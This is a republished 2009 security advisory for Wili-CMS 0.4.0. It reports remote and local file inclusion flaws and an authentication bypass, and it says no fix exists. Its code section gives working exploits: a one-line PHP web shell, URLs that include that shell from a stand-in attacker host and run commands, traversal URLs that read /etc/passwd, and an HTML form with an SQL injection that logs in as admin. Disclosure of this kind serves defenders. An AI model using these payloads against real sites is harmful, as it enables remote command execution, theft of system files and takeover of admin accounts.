Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21434
HistoryMar 09, 2009 - 12:00 a.m.

Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)

2009-03-0900:00:00
vulners.com
9
JSON

******* Salvatore "drosophila" Fresta *******

[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/

[+] Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]

[+] Menu

1) Bugs
2) Code
3) Fix

[+] Bugs

  • [A] Multiple Remote/Local File Inclusion

[-] Requisites: none
[-] File affected: index.php

This bug allows a guest to include remote and
local files and however to exec remote commands.

if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}

include( template_file( $globals['root_template'] ) );

  • [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.

$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];

$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );

  // password ok -> login

if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);

if ( $globals['admin_modus'] == "loggedin" ) {
     // log login
     db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
     // goto welcome page if skipwelcome flag of this user is not set
     if ( !(mysql_result( $userh, 0, 1 )) ) {
       $_REQUEST['npage'] = get_firstpage( "adminwelcome" );
     }
     $globals['admin_modus'] = "";
}

...

[+] Code

  • [A] Multiple Remote/Local File Inclusion

shell.txt: <?php system($_GET['cmd']); ?>

http://www.site.com/path/?npage=-1&amp;content_dir=http://www.evilsite.com/shell.txt&#37;00&amp;cmd=ls
http://www.site.com/path/?npage=1&amp;content_dir=http://www.evilsite.com/shell.txt&#37;00&amp;cmd=ls

http://www.site.com/path/?npage=-1&amp;content_dir=../../../../etc/passwd&#37;00
http://www.site.com/path/?npage=1&amp;content_dir=../../../../etc/passwd&#37;00

  • [B] Authentication Bypass

<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php&quot; method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>

[+] Fix

No fix.


Salvatore "drosophila" Fresta
CWNP444351

JSON